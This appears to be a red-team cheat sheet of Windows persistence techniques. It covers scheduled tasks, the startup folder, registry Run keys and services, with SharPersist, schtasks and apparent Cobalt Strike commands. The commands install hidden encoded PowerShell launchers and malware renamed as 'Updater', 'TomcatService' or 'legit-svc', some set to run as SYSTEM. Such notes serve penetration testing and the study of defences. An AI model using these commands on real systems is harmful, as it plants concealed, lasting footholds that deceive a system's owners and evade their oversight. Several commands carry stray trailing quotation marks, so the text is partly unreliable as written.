Scheduled Tasks, Startup Folder, Autoruns and Services

- Scheduled Tasks

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

To create one with SharPersist (https://github.com/mandiant/SharPersist)

SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc {encoded command (Explotaition/Remote Shell/Powershell)}" -n "Updater" -m add -o hourly

Where:

-t is the desired persistence technique.

-c is the command to execute.

-a are any arguments for that command.

-n is the name of the task.

-m is to add the task (you can also remove, check and list).

-o is the task frequency.

To create Scheduled Tasks manually (C:/Windows/System32/schtasks.exe):

Create and execute scheduled task:

schtasks.exe /create /tn ImagingDevices /tr C:\Tomcat_3.4.7\lib\ImagingDevices.exe /sc ONSTART /rl HIGHEST /f"

Create, run now and run at a certain time every day (Example with a fake Tomcat Service taking advantage of existing tomcat web server):

schtasks.exe /create /tn TomcatService /tr C:\Tomcat_3.4.7\bin\Tomcat.exe /sc DAILY /st 08:00 /ru SYSTEM /rl HIGHEST /f"

To run it as SYSTEM

schtasks.exe /create /tn ImagingDevices /tr C:\Tomcat_3.4.7\lib\ImagingDevices.exe /sc ONSTART /ru SYSTEM /rl HIGHEST /f"

schtasks.exe /run /tn ImagingDevices"

Check task:

schtasks.exe /query /tn ImagingDevices /v /fo LIST"

Listar tasks:

schtasks.exe /query /fo TABLE"

Delete tasks:

schtasks.exe /delete /tn ImagingDevices /f"

- Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).

To create one with SharPersist:

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc {encoded command}" -f "UserEnvSetup" -m add

- HKCU / HKLM Registry Autoruns

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

Example using SharPersist:

cd C:\ProgramData

upload C:\Payloads\http_x64.exe

mv http_x64.exe updater.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Where:

-k is the registry key to modify.

-v is the name of the registry key to create.

- Windows Services

We can create a service that runs at startup or locate an unnecessary service that runs at startup. This way, we are safe under reboots. Ti do so we must rename our malware and place it in the path of the existing service. For example, we could use Google Updater.

To create our own service with SharPersist:

cd C:\Windows

upload C:\Payloads\tcp-local_x64.svc.exe

mv tcp-local_x64.svc.exe legit-svc.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add